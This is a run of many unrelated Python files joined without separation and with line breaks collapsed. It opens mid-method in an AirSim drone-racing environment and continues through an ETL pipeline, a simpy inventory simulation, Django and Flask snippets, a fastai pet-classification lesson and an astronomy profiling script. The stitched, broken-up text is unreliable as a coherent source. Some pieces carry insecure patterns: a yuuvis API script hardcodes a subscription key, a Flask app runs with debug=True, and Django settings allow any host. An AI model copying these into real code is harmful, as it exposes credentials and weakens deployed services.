if self.reward_functions[i].death: # TODO: check that the dead vehicle has indeed been detected as dead in the software self.airsim_client.disarm(vehicle_name=self.drones_names[i]) self.death_occurred = True self.airsim_client.simPause(True) if self.time_stop else self.airsim_client.simPause(False) return obs_n, rew_n, done_n, info_n def _step_common_begin(self): # TODO : cap action whithin self.action_space """ This function outputs a random order on drones (for calling the API in random order in real time control) """ self.current_step += 1 idxs = list(range(self.nb_drones)) random.shuffle(idxs) return idxs # gym user API functions: def reset(self): # TODO: add support for random initial drone placement and gate randomization """ Use reset() to reset the environment !: compatible only with 1 or 2 drones """ self._join_act_thread() # print_with_pid("DEBUG: called env reset()") if not self.initialized: # print_with_pid("DEBUG: rllib compatibility") return self._initialize() self.current_step = 0 self.death_occurred = False self.z_targets = [self.default_z_target,] * self.nb_drones # caution: airsim_client.reset() seems to make Airsim crash quite often # see: https://github.com/microsoft/AirSim-NeurIPS2019-Drone-Racing/issues/60 : # signal.alarm(RESET_TIMEOUT + 1) # enable alarm # print_with_pid("DEBUG: called simPause(False)") self.airsim_client.simPause(False) # print_with_pid("DEBUG: called sim reset()") self.airsim_client.reset() # print_with_pid("DEBUG: called simResetRace()") self.airsim_client.simResetRace() time.sleep(SLEEP_TIME_AT_RESETRACE) # print_with_pid("DEBUG: called simPause(True)") self.airsim_client.simPause(True) # print_with_pid("DEBUG: called _gates_randomization()") self._gates_randomization() for drone_name in self.drones_names: self.airsim_client.enableApiControl(vehicle_name=drone_name) self.airsim_client.arm(vehicle_name=drone_name) obs = [] self.reward_functions = [] # must be initialized after first call to simResetRace() for tiers 2 and 3 for drone_idx, drone_name in enumerate(self.drones_names): self.reward_functions.append(rf.RewardFunction(airsim_client=self.airsim_client, vehicle_name=drone_name, base_offset=self.drones_offsets[drone_idx], objectives=self.current_objectives, param_dict=self.rf_config)) if len(self.reward_functions) == 2: # in the multiagent setting, we have to set opponent reward functions self.reward_functions[0].set_opponent_RewardFunction(self.reward_functions[1]) self.reward_functions[1].set_opponent_RewardFunction(self.reward_functions[0]) for drone_idx in range(len(self.drones_names)): obs.append(self._get_obs(drone_idx, self.default_act)) # print_with_pid(f'DEBUG: called simStartRace(tier={self.tier})') self.airsim_client.simStartRace(tier=1 if self.tier == 0 else self.tier, competitor=False) # must be called the first time after instantiating reward functions or reward functions will be broken in tier 2 and 3 (because of noisy gate estimates) self.airsim_client.simPause(True) if self.time_stop else self.airsim_client.simPause(False) # print_with_pid('DEBUG: PauseEnd') # print_with_pid('DEBUG: end reset') return obs def step(self, action): """ Call this function to perform a step :param action: numpy.array[n_drones][n_actions] values for each action of each drone returns: obs_n, rew_n, done_n, either of the CURRENT (if not real_time) or PREVIOUS (if real_time) transition: see real-time RL """ self._join_act_thread() idxs = self._step_common_begin() if not self.real_time: self._apply_action_n(action, idxs) obs_n, rew_n, done_n, info_n 
= self._get_states(action) if self.real_time: self._apply_action_n(action, idxs) return obs_n, rew_n, done_n, info_n def stop(self): self._join_act_thread() if self.process is not None: print_with_pid(f"DEBUG: call to stop(). Calling _kill_simulator()") self._kill_simulator() self.airsim_client = None self.process = None def render(self, mode='human', camera_name='fpv_cam_1', drone_idx=0): # TODO: render should visually show the current state of the environment (should not use simGetImages) self._join_act_thread() request = [airsim.ImageRequest(camera_name, airsim.ImageType.Scene, False, False)] response = self.airsim_client.simGetImages(request, vehicle_name=self.drones_names[drone_idx]) img_rgb_1d1 = np.fromstring(response[0].image_data_uint8, dtype=np.uint8) img = img_rgb_1d1.reshape(response[0].height, response[0].width, 3) print("image shape: ", img.shape) Alexjmsherman/Data_Pipeline __author__ = "alsherman" import logging from .sources_metadata.source_metadata import SourceMetadata from Get_Data import download_data from Export_Data.create_csv import CSVCreator logger = logging.getLogger(__name__) class DataPipeline: """ ETL processes for each data source. Downloads data, Cleans data, and creates a CSV. Five steps process: 1. Get metadata about the data source (e.g. name, url, data format) 2. Instantiate a DownloadData class, which determines the appropriate extract methods based on data format 3. Download the data 4. Apply custom data cleaning functions 5. Export the data """ def __init__(self, name, sources_metadata, data_category, func, local=False): """ :param name: the name of the script :param sources_metadata: metadata about the source, used to identify correct download methods :param data_category: data category, used specific file to download when one source has many files :param func: custom data cleaning function :param local: specifies whether to use a local file or download data (used for testing purposes) """ self.name = name self.sources_metadata = sources_metadata self.data_category = data_category self.local = local self._func = func def run_pipeline(self): """ get dataset metadata, download data, clean data, and export data """ logger.info('start {}'.format(self.name)) source_metadata = SourceMetadata(sources_metadata=self.sources_metadata, data_category=self.data_category, local=self.local) downloader = download_data.DownloadData(source_metadata) source_metadata.downloaded_data = downloader.download(source_metadata.download_type) source_metadata.dataframe = self._func(source_metadata) CSVCreator(source_metadata).create_csv(self.sources_metadata) logger.info('completed {}'.format(self.name)) import matplotlib.pyplot as plt import random import simpy class Model: def __init__(self, env, op, oq, lt, init): self.env = env self.op = op # ordering point self.oq = oq # order quantity self.lt = lt # replenishment lead time self.at_hand = init # how many items you have at hand self.loss = 0 # opportunity loss self.orders = [] # list of back orders @property def total(self): return sum(self.orders) +self.at_hand def print_state(self): print('[{}] current level: {}, back order: {}, lost sales: {} '.format(round(self.env.now), self.at_hand, self.orders, self.loss)) self.env.log.extend() def seller(self): while True: yield self.env.timeout(random.expovariate(1)) if self.at_hand > 0: self.at_hand -= 1 # sell an item to the customer self.env.stocktake.succeed() # activate the stocktaker else: self.loss += 1 # sorry we are out of stock self.print_state() # state after dealing with 
each customer def stocktaker(self): while True: self.env.stocktake = self.env.event() # create the signal yield self.env.stocktake if self.total <= self.op: self.orders.append(self.oq) self.env.process(self.deliverer()) # activate deliverer def deliverer(self): self.print_state() # state after an order is placed yield self.env.timeout(self.lt) if len(self.orders) > 0: self.at_hand += self.orders.pop(0) self.print_state() # state after an order is fulfilled class Log: def __init__(self, env): self.env = env self.time = [] self.at_hand = [] self.loss = [] self.total = [] self.extend() def extend(self): self.time.append(self.env.now) self.at_hand.append(self.env.model.at_hand) self.loss.append(self.env.model.loss) self.total.append(self.env.model.total) def plot_log(self): plt.plot(self.time, self.at_hand, drawstyle = "steps-post") plt.xlabel("time (minute)") plt.ylabel("number of items") plt.show() def main(): env = simpy.Environment() env.model = Model(env, 10, 20, 10, 20) # op, oq, lt, init env.log = Log(env) env.process(env.model.seller()) env.process(env.model.stocktaker()) env.run(until=200) env.log.plot_log() if __name__ == "__main__": main() import requests import json key = "9247ef2009ba4e86a10874c39a1f1868" #relative path to your new query file queryFilePath = '/path/to/your/query.json' headerDict = {} paramDict = {} #baseUrl = 'https' + '://' + 'api.yuuvis.io' objectId = '805715d6-9ed9-4069-8922-bb587ce9d652' baseUrl = 'https' + '://' + 'api.yuuvis.io' header_name = 'Content-Type' headerDict['Content-Type'] = 'application/json' header_name = 'Ocp-Apim-Subscription-Key' headerDict['Ocp-Apim-Subscription-Key'] = key session = requests.Session() response = session.get(str(baseUrl+'/dms/objects/'+objectId+'/contents/file'), headers=headerDict) print(response.text)10-100 class Solution: def deserialize(self, s): stack, num, last = [], "", None for c in s: if c.isdigit() or c == "-": num += c elif c == "," and num: stack[-1].add(NestedInteger(int(num))) num = "" elif c == "[": elem = NestedInteger() if stack: stack[-1].add(elem) stack.append(elem) elif c == "]": if num: stack[-1].add(NestedInteger(int(num))) num = "" last = stack.pop() return last if last else NestedInteger(int(num))from .... pyaz_utils import _call_az def create(gateway_name, name, public_cert_data, resource_group): ''' Upload a root certificate. Required Parameters: - gateway_name -- Virtual network gateway name - name -- Root certificate name - public_cert_data -- Base64 contents of the root certificate file or file path. - resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=` ''' return _call_az("az network vnet-gateway root-cert create", locals()) def delete(gateway_name, name, resource_group): ''' Delete a root certificate. Required Parameters: - gateway_name -- Virtual network gateway name - name -- Root certificate name - resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=` ''' return _call_az("az network vnet-gateway root-cert delete", locals()) #!python """ validation check for checking the password """ import time import getpass def check_password(password, address): """ This will check to see if a password is given or if one needs to be asked for Args: password (None|str) : this will be None if no password is given or check to make sure a string otherwise. 
address (str) : string of the address getting password for return: str : password either validated or gotten from a user """ while True: if not isinstance(address, str): raise ValueError( f"You gave me an address of {address} of type {type(address)}. It needs to be a string." ) if password is None or not isinstance(password, str): password = getpass.getpass( f"Please enter your password for system at IP {address}: " ) if password is not None and isinstance(password, str): if len(password) < 513: if len(password) > 0: return password else: print( f"Password was less than 1 character. Please re-enter the CORRECT password" ) else: print( f"Password was greater than 512 characters." f" Please re-enter the CORRECT password because no password is really that long." ) password = None if __name__ == "__main__": start_time = time.time() password_list_to_test = [ None, 1, "a", "asdlfjalsjdf;lajsdfljlaksjfklla;dlfasl;dfj;alsjdf;lajsdfl;jaslfdjl;asj;dflasjdlfj;alsdlf;asldfj;asldfj;lasjdfl;ajsfld;jasfdoasydfiahsidfasbfmasfjbasfbasbfbasfdbasbfkabsdkfjbaksjdbfkasbfkbaskfdjbaksfbkasbfkjasbdfkbasdkfbaksjfkasfjabfkjabsdfkbaskdkjasbdkf", "asdlfjalsjdf;lajsdfljlaksjfklla;dlfasl;dfj;alsjdf;lajsdfl;jaslfdjl;asj;dflasjdlfj;alsdlf;asldfj;asldfj;lasjdfl;ajsfld;jasfdoasydfiahsidfasbfmasfjbasfbasbfbasfdbasbfkabsdkfjbaksjdbfkasbfkbaskfdjbaksfbkasbfkjasbdfkbasdkfbaksjfkasfjabfkjabsdfkbaskdkjasbdkfasdfasdfasdlfjalsjdf;lajsdfljlaksjfklla;dlfasl;dfj;alsjdf;lajsdfl;jaslfdjl;asj;dflasjdlfj;alsdlf;asldfj;asldfj;lasjdfl;ajsfld;jasfdoasydfiahsidfasbfmasfjbasfbasbfbasfdbasbfkabsdkfjbaksjdbfkasbfkbaskfdjbaksfbkasbfkjasbdfkbasdkfbaksjfkasfjabfkjabsdfkbaskdkjasbdkfasdfasdfasdlfjalsjdf;lajsdfljlaksjfklla;dlfasl;dfj;alsjdf;lajsdfl;jaslfdjl;asj;dflasjdlfj;alsdlf;asldfj;asldfj;lasjdfl;ajsfld;jasfdoasydfiahsidfasbfmasfjbasfbasbfbasfdbasbfkabsdkfjbaksjdbfkasbfkbaskfdjbaksfbkasbfkjasbdfkbasdkfbaksjfkasfjabfkjabsdfkbaskdkjasbdkfasdfasdf", ] address_for_test = "192.168.1.65" for password in password_list_to_test: print(f"The password is : {check_password(password, address_for_test)}") duration = time.time() - start_time print(f"Duration to run was {duration}") combofish/chips-get #!/usr/bin/env python # coding:utf-8 # Filename: answer-flask.py from flask import Flask, render_template, request app = Flask(__name__) @app.route('/') def home(): return "It's alive!" 
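# The /home route defined next reads optional query parameters and passes them to the
# home.html template; as a usage sketch (the values below are just examples), a request like
#   GET /home?thing=kettle&height=3&color=red
# renders home.html with thing='kettle', height='3', color='red' (missing parameters come back as None).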
@app.route('/home') def anotherhome(): kwargs = {} kwargs["thing"] = request.args.get('thing') kwargs["height"] = request.args.get('height') kwargs["color"] = request.args.get('color') return render_template('home.html',**kwargs) app.run(port=5000,debug=True) from django.contrib import admin from .models import ImageModel, PixelCount class ImageModelAdmin(admin.ModelAdmin): list_display = ("image", "id", "upload_date") search_fields = ("upload_date",) list_filter = ("upload_date",) empty_value_display = "-пусто-" class PixelCountAdmin(admin.ModelAdmin): list_display = ("image", "id", "image_id") search_fields = ("colors",) list_filter = ("image",) empty_value_display = "-пусто-" admin.site.register(ImageModel, ImageModelAdmin) admin.site.register(PixelCount, PixelCountAdmin) # -*- coding: utf-8 -*- """ Created on Mon May 20 18:07:24 2019 @author: AGNPT-M-001 """ # %% import liesl from dataclasses import dataclass from phase_triggered_tms.tms_preparation.tools import eeg_channels import localite.api from luckyloop.client import LuckyClient import pylsl @dataclass class Environment(): coil = None #:localite.Coil(host="172.16.58.3") marker = None #:liesl.open_streams(type='Markers', # name="BrainVision RDA Markers", # hostname='Patrick')[0] bvr = None #:liesl.open_streams(type='EEG', # name="BrainVision RDA", # hostname='Patrick')[0] lucky = None buffer = None #:liesl.RingBuffer(bvr, duration_in_ms=2000) def setup(self): self.buffer.start() labels = liesl.get_channel_map(pylsl.StreamInlet(self.bvr)) self.labels = list(labels.keys()) self.emg_labels = [l for l in self.labels if l not in eeg_channels()] self.eeg_labels = [l for l in self.labels if l in eeg_channels()]#! /usr/bin/env python import sys if len(sys.argv) > 1: code = int(sys.argv[1]) else: code = 0 text = sys.stdin.read() sys.stdout.write(text) sys.stderr.write(text) sys.exit(code) """ Django settings for comics project. """ import os # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = os.getenv('DJANGO_SECRET', 'SAMPLE_KEY_PLEASE_CHANGE') # SECURITY WARNING: don't run with debug turned on in production! 
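# DEBUG is read from the DJANGO_DEBUG environment variable as an int (default 0, i.e. off);
# e.g. running with DJANGO_DEBUG=1 turns debug mode on, which in turn disables the
# secure-cookie and SSL-redirect settings derived from it just below.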
DEBUG = int(os.getenv('DJANGO_DEBUG', '0')) CSRF_COOKIE_SECURE = not DEBUG SESSION_COOKIE_SECURE = not DEBUG SECURE_SSL_REDIRECT = not DEBUG # Ad configuration ADS_TXT_URL = os.getenv('DJANGO_ADS_TXT_URL', None) # Hosts ALLOWED_HOSTS = ['*'] # Apps INSTALLED_APPS = [ 'comics.admin.ComicsAdminConfig', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'apps.comics.apps.ComicsConfig', ] # Middleware MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', 'apps.comics.middleware.ComicUrlMiddleware', ] # Paths to config modules ROOT_URLCONF = 'comics.urls' WSGI_APPLICATION = 'comics.wsgi.application' # Templates TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] # Database DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': '/var/lib/comics/comics.sqlite3', } } DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField' # Password validation AUTH_PASSWORD_VALIDATORS = [ {'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator'}, {'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator'}, {'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator'}, {'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator'}, ] # Internationalization LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) STATIC_URL = '/static/' STATIC_ROOT = '/var/www/static' MEDIA_URL = '/media/' MEDIA_ROOT = '/var/www/media' import operator from ..abc import SequenceExpression class ADD(SequenceExpression): """ Add all values from expressions. """ def __call__(self, context, event, *args, **kwargs): return self.reduce(operator.add, context, event, *args, **kwargs) class DIV(SequenceExpression): """ Divides values in expression """ def __call__(self, context, event, *args, **kwargs): return self.reduce(operator.truediv, context, event, *args, **kwargs) class MUL(SequenceExpression): """ Multiplies values in expression. """ def __call__(self, context, event, *args, **kwargs): return self.reduce(operator.mul, context, event, *args, **kwargs) class SUB(SequenceExpression): """ Subtracts values in expression """ def __call__(self, context, event, *args, **kwargs): return self.reduce(operator.sub, context, event, *args, **kwargs) class MOD(SequenceExpression): """ Modules values in expression. """ def __call__(self, context, event, *args, **kwargs): return self.reduce(operator.mod, context, event, *args, **kwargs) 10-100 import pygame from buffalo import utils from friendly import Friendly from trade import Trade from tradingUI import TradingUI from npc import NPC from camera import Camera # Extension of friendly NPCs, offers items in exchange for other items. 
Makes the # trade window appear when you click on him class Trader(Friendly): def __init__(self, **kwargs): self.trades = [Trade("axe"), Trade("potion")] Friendly.__init__(self, name=kwargs.get("name"), fPos=kwargs.get("fPos"), speed=kwargs.get("speed"), spawn=kwargs.get("spawn")) self.active = False self.tradeUI = None def update(self, inventory, manager): if self.tradeUI is None: self.tradeUI = TradingUI(inventory, self.trades) if pygame.mouse.get_pressed()[0] and not self.active: traderRect = pygame.Rect(self.pos, self.size) mousePos = pygame.mouse.get_pos() mousePos = (mousePos[0] + Camera.pos[0], mousePos[1] + Camera.pos[1]) if traderRect.collidepoint(mousePos): manager.active = True manager.registerGUI(self.tradeUI) self.active = True keys = pygame.key.get_pressed() if keys[pygame.K_e] and self.active: manager.deregisterGUI(self.tradeUI) self.active = False self.tradeUI = None# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.3' # jupytext_version: 0.8.6 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Lesson 1 - What's your pet # Welcome to lesson 1! For those of you who are using a Jupyter Notebook for the first time, you can learn about this useful tool in a tutorial we prepared specially for you; click `File`->`Open` now and click `00_notebook_tutorial.ipynb`. # # In this lesson we will build our first image classifier from scratch, and see if we can achieve world-class results. Let's dive in! # # Every notebook starts with the following three lines; they ensure that any edits to libraries you make are reloaded here automatically, and also that any charts or images displayed are shown in this notebook. # %reload_ext autoreload # %autoreload 2 # %matplotlib inline # We import all the necessary packages. We are going to work with the [fastai V1 library](http://www.fast.ai/2018/10/02/fastai-ai/) which sits on top of [Pytorch 1.0](https://hackernoon.com/pytorch-1-0-468332ba5163). The fastai library provides many useful functions that enable us to quickly and easily build neural networks and train our models. from fastai.vision import * from fastai.metrics import error_rate # If you're using a computer with an unusually small GPU, you may get an out of memory error when running this notebook. If this happens, click Kernel->Restart, uncomment the 2nd line below to use a smaller *batch size* (you'll learn all about what this means during the course), and try again. bs = 64 # bs = 16 # uncomment this line if you run out of memory even after clicking Kernel->Restart # ## Looking at the data # We are going to use the [Oxford-IIIT Pet Dataset](http://www.robots.ox.ac.uk/~vgg/data/pets/) by [ et al., 2012](http://www.robots.ox.ac.uk/~vgg/publications/2012/parkhi12a/parkhi12a.pdf) which features 12 cat breeds and 25 dogs breeds. Our model will need to learn to differentiate between these 37 distinct categories. According to their paper, the best accuracy they could get in 2012 was 59.21%, using a complex model that was specific to pet detection, with separate "Image", "Head", and "Body" models for the pet photos. Let's see how accurate we can be using deep learning! # # We are going to use the `untar_data` function to which we must pass a URL as an argument and which will download and extract the data. 
help(untar_data) # + #dataPath = '/Users/singhalmanik/Code/Courses/fast-ai/data' #d = pathlib.Path(dataPath) #d # - #path = untar_data(URLs.PETS, dest=d, force_download=True) path = untar_data(URLs.PETS) path #path = path/'oxford-iiit-pet' path.ls() path_anno = path/'annotations' path_img = path/'images' # The first thing we do when we approach a problem is to take a look at the data. We _always_ need to understand very well what the problem is and what the data looks like before we can figure out how to solve it. Taking a look at the data means understanding how the data directories are structured, what the labels are and what some sample images look like. # # The main difference between the handling of image classification datasets is the way labels are stored. In this particular dataset, labels are stored in the filenames themselves. We will need to extract them to be able to classify the images into the correct categories. Fortunately, the fastai library has a handy function made exactly for this, `ImageDataBunch.from_name_re` gets the labels from the filenames using a [regular expression](https://docs.python.org/3.6/library/re.html). fnames = get_image_files(path_img) fnames[:5] np.random.seed(2) pat = re.compile(r'/([^/]+)_\d+.jpg$') data = ImageDataBunch.from_name_re(path_img, fnames, pat, ds_tfms=get_transforms(), size=224, bs=bs ).normalize(imagenet_stats) data.show_batch(rows=4, figsize=(7,6)) print(data.classes) len(data.classes),data.c # ## Training: resnet34 # Now we will start training our model. We will use a [convolutional neural network](http://cs231n.github.io/convolutional-networks/) backbone and a fully connected head with a single hidden layer as a classifier. Don't know what these things mean? Not to worry, we will dive deeper in the coming lessons. For the moment you need to know that we are building a model which will take images as input and will output the predicted probability for each of the categories (in this case, it will have 37 outputs). # # We will train for 4 epochs (4 cycles through all our data). learn = create_cnn(data, models.resnet34, metrics=error_rate) learn.model learn.fit_one_cycle(4) learn.save('stage-1') # ## Results # Let's see what results we have got. # # We will first see which were the categories that the model most confused with one another. We will try to see if what the model predicted was reasonable or not. In this case the mistakes look reasonable (none of the mistakes seems obviously naive). This is an indicator that our classifier is working correctly. # # Furthermore, when we plot the confusion matrix, we can see that the distribution is heavily skewed: the model makes the same mistakes over and over again but it rarely confuses other categories. This suggests that it just finds it difficult to distinguish some specific categories between each other; this is normal behaviour. # + interp = ClassificationInterpretation.from_learner(learn) losses,idxs = interp.top_losses() len(data.valid_ds)==len(losses)==len(idxs) # - interp.plot_top_losses(9, figsize=(15,11)) doc(interp.plot_top_losses) interp.plot_confusion_matrix(figsize=(12,12), dpi=60) interp.most_confused(min_val=2) # ## Unfreezing, fine-tuning, and learning rates # Since our model is working as we expect it to, we will *unfreeze* our model and train some more. learn.unfreeze() learn.fit_one_cycle(1) learn.load('stage-1'); learn.lr_find() learn.recorder.plot() learn.unfreeze() learn.fit_one_cycle(2, max_lr=slice(1e-6,1e-4)) # That's a pretty accurate model! 
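# Before moving on to a bigger model, we can optionally double-check that accuracy on the validation set. This is just a quick sanity check — a minimal sketch assuming the standard fastai v1 `Learner.validate` call, which is not otherwise used in this lesson — and it returns the validation loss followed by the metrics we asked for (here, `error_rate`).

learn.validate()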
# ## Training: resnet50 # Now we will train in the same way as before but with one caveat: instead of using resnet34 as our backbone we will use resnet50 (resnet34 is a 34 layer residual network while resnet50 has 50 layers. It will be explained later in the course and you can learn the details in the [resnet paper](https://arxiv.org/pdf/1512.03385.pdf)). # # Basically, resnet50 usually performs better because it is a deeper network with more parameters. Let's see if we can achieve a higher performance here. To help it along, let's us use larger images too, since that way the network can see more detail. We reduce the batch size a bit since otherwise this larger network will require more GPU memory. data = ImageDataBunch.from_name_re(path_img, fnames, pat, ds_tfms=get_transforms(), size=299, bs=bs//2).normalize(imagenet_stats) learn = create_cnn(data, models.resnet50, metrics=error_rate) learn.lr_find() learn.recorder.plot() learn.fit_one_cycle(8) learn.save('stage-1-50') # It's astonishing that it's possible to recognize pet breeds so accurately! Let's see if full fine-tuning helps: learn.unfreeze() learn.fit_one_cycle(3, max_lr=slice(1e-6,1e-4)) # If it doesn't, you can always go back to your previous model. learn.load('stage-1-50'); interp = ClassificationInterpretation.from_learner(learn) interp.most_confused(min_val=2) # ## Other data formats path = untar_data(URLs.MNIST_SAMPLE); path tfms = get_transforms(do_flip=False) data = ImageDataBunch.from_folder(path, ds_tfms=tfms, size=26) data.show_batch(rows=3, figsize=(5,5)) learn = create_cnn(data, models.resnet18, metrics=accuracy) learn.fit(2) df = pd.read_csv(path/'labels.csv') df.head() data = ImageDataBunch.from_csv(path, ds_tfms=tfms, size=28) data.show_batch(rows=3, figsize=(5,5)) data.classes data = ImageDataBunch.from_df(path, df, ds_tfms=tfms, size=24) data.classes fn_paths = [path/name for name in df['name']]; fn_paths[:2] pat = r"/(\d)/\d+\.png$" data = ImageDataBunch.from_name_re(path, fn_paths, pat=pat, ds_tfms=tfms, size=24) data.classes data = ImageDataBunch.from_name_func(path, fn_paths, ds_tfms=tfms, size=24, label_func = lambda x: '3' if '/3/' in str(x) else '7') data.classes labels = [('3' if '/3/' in str(x) else '7') for x in fn_paths] labels[:5] data = ImageDataBunch.from_lists(path, fn_paths, labels=labels, ds_tfms=tfms, size=24) data.classes EmilPi/PuzzleLib import time import numpy as np from PuzzleLib.Backend import gpuarray from PuzzleLib.Containers.Sequential import Sequential from PuzzleLib.Containers.Parallel import Parallel from PuzzleLib.Modules.Embedder import Embedder from PuzzleLib.Modules.Reshape import Reshape from PuzzleLib.Modules.Replicate import Replicate from PuzzleLib.Modules.Conv2D import Conv2D from PuzzleLib.Modules.MaxPool2D import MaxPool2D from PuzzleLib.Modules.Concat import Concat from PuzzleLib.Modules.Activation import Activation, relu from PuzzleLib.Modules.Dropout import Dropout from PuzzleLib.Modules.Linear import Linear def buildBranch(fHeight, sentlength, branchMaps, embsize): seq = Sequential() seq.append(Conv2D(1, outmaps=branchMaps, size=(fHeight, embsize))) seq.append(MaxPool2D(size=(sentlength - fHeight + 1, 1))) seq.append(Reshape((-1, branchMaps))) return seq def buildNet(vocabulary, branches, w2v, sentlength, embsize, wscale, dim=2, branchMaps=100, name="sentinet"): def onVocabulary(W): W[0] = np.zeros((1, embsize), dtype=np.float32) arrayPOS = [ "", "_S", "_A", "_V", "_UNKN", "_ADJ", "_ADV", "_INTJ", "_NOUN", "_PROPN", "_VERB", "_ADP", "_AUX", "_CCONJ", "_DET", "_NUM", 
"_PART", "_PRON", "_SCONJ", "_SUM", "_X" ] tmpPOS = [] if not w2v: return for word in vocabulary: for pos in tmpPOS: if (word + pos) in w2v.vocab: W[vocabulary[word]] = w2v[word + pos] break for i, pos in enumerate(arrayPOS): if (word + pos) in w2v.vocab: tmpPOS.append(pos) W[vocabulary[word]] = w2v[word + pos] del arrayPOS[i] break net = Sequential(name) net.setAttr("timestamp", int(time.time())) net.append(Embedder( vocabulary, sentlength, embsize, wscale=wscale, onVocabulary=onVocabulary, learnable=True, name="embedder" )) net.append(Reshape((-1, 1, sentlength, embsize))) branchNum = len(branches) net.append(Replicate(times=branchNum)) par = Parallel() for branchFilterSize in branches: par.append(buildBranch(branchFilterSize, sentlength, branchMaps, embsize)) net.append(par) net.append(Concat(axis=1)) net.append(Activation(relu)) net.append(Dropout(p=0.5)) net.append(Linear(branchNum * branchMaps, dim)) return net def unittest(): vocabsize = 1000 sentlength, embsize = 100, 128 data = gpuarray.to_gpu(np.random.randint(0, vocabsize, (1, sentlength), dtype=np.int32)) senti = buildNet(vocabsize, (3, 5, 7), None, sentlength, embsize, 1.0) senti(data) del senti gpuarray.memoryPool.freeHeld() if __name__ == "__main__": unittest() ''' Created on Aug 23, 2012 @author: Chris ''' DIPLOMAT_INCOME = "Diplomatic Relations" SITE_INCOME = "Sites" ITEM_INCOME = "Items" UNIT_MAINT = "Unit Maintenance" INCOME_TYPES = {SITE_INCOME, UNIT_MAINT, DIPLOMAT_INCOME, ITEM_INCOME}vivainio/zipgetzipget/__main__.py from . import zipget zipget.main() AshKelly/PyAutoLens import time from autolens.model.profiles import light_profiles as lp from autolens.data.array import mask as msk from autolens.lens import lens_data as ld from test.profiling import tools # Although we could test the intensities without using an image (e.g. by just making a grid), we have chosen to # set this test up using an image and mask. 
This gives run-time numbers that can be easily related to an actual lens # analysis sub_grid_size = 4 radius_arcsec = 3.0 print('sub grid size = ' + str(sub_grid_size)) print('circular mask radius = ' + str(radius_arcsec) + '\n') for image_type in ['LSST', 'Euclid', 'HST', 'HST_Up', 'AO']: ccd_data = tools.load_profiling_ccd_data(image_type=image_type, lens_name='no_lens_source_smooth', psf_shape=(3,3)) mask = msk.Mask.circular(shape=ccd_data.shape, pixel_scale=ccd_data.pixel_scale, radius_arcsec=radius_arcsec) lens_data = ld.LensData(ccd_data=ccd_data, mask=mask, sub_grid_size=sub_grid_size) print('Deflection angle run times for image type ' + image_type + '\n') print('Number of points = ' + str(lens_data.grid_stack.sub.shape[0]) + '\n') ### EllipticalGaussian ### mass_profile = lp.EllipticalGaussian(centre=(0.0, 0.0), axis_ratio=0.8, phi=45.0, sigma=1.0) start = time.time() mass_profile.intensities_from_grid(grid=lens_data.grid_stack.sub) diff = time.time() - start print("EllipticalGaussian time = {}".format(diff)) ### SphericalGaussian ### mass_profile = lp.SphericalGaussian(centre=(0.0, 0.0), sigma=1.0) start = time.time() mass_profile.intensities_from_grid(grid=lens_data.grid_stack.sub) diff = time.time() - start print("SphericalGaussian time = {}".format(diff)) ### EllipticalExponential ### profile = lp.EllipticalExponential(centre=(0.0, 0.0), axis_ratio=0.8, phi=45.0, intensity=1.0, effective_radius=1.0) start = time.time() profile.intensities_from_grid(grid=lens_data.grid_stack.sub) diff = time.time() - start print("EllipticalExponential time = {}".format(diff)) ### SphericalExponential ### profile = lp.SphericalExponential(centre=(0.0, 0.0), intensity=1.0, effective_radius=1.0) start = time.time() profile.intensities_from_grid(grid=lens_data.grid_stack.sub) diff = time.time() - start print("SphericalExponential time = {}".format(diff)) ### EllipticalDevVaucouleurs ### profile = lp.EllipticalDevVaucouleurs(centre=(0.0, 0.0), axis_ratio=0.8, phi=45.0, intensity=1.0, effective_radius=1.0) start = time.time() profile.intensities_from_grid(grid=lens_data.grid_stack.sub) diff = time.time() - start print("EllipticalDevVaucouleurs time = {}".format(diff)) ### SphericalDevVaucouleurs ### profile = lp.SphericalDevVaucouleurs(centre=(0.0, 0.0), intensity=1.0, effective_radius=1.0) start = time.time() profile.intensities_from_grid(grid=lens_data.grid_stack.sub) diff = time.time() - start print("SphericalDevVaucouleurs time = {}".format(diff)) ### EllipticalSersic ### mass_profile = lp.EllipticalSersic(centre=(0.0, 0.0), axis_ratio=0.8, phi=45.0, intensity=1.0, effective_radius=1.0, sersic_index=2.5) start = time.time() mass_profile.intensities_from_grid(grid=lens_data.grid_stack.sub) diff = time.time() - start print("EllipticalSersic time = {}".format(diff)) ### SphericalSersic ### mass_profile = lp.SphericalSersic(centre=(0.0, 0.0), intensity=1.0, effective_radius=1.0, sersic_index=2.5) start = time.time() mass_profile.intensities_from_grid(grid=lens_data.grid_stack.sub) diff = time.time() - start print("SphericalSersic time = {}".format(diff)) ### EllipticalCoreSersic ### mass_profile = lp.EllipticalCoreSersic(centre=(0.0, 0.0), axis_ratio=0.8, phi=45.0, intensity=1.0, effective_radius=1.0, sersic_index=2.5, radius_break=0.01, intensity_break=0.05, gamma=0.25, alpha=3.0) start = time.time() 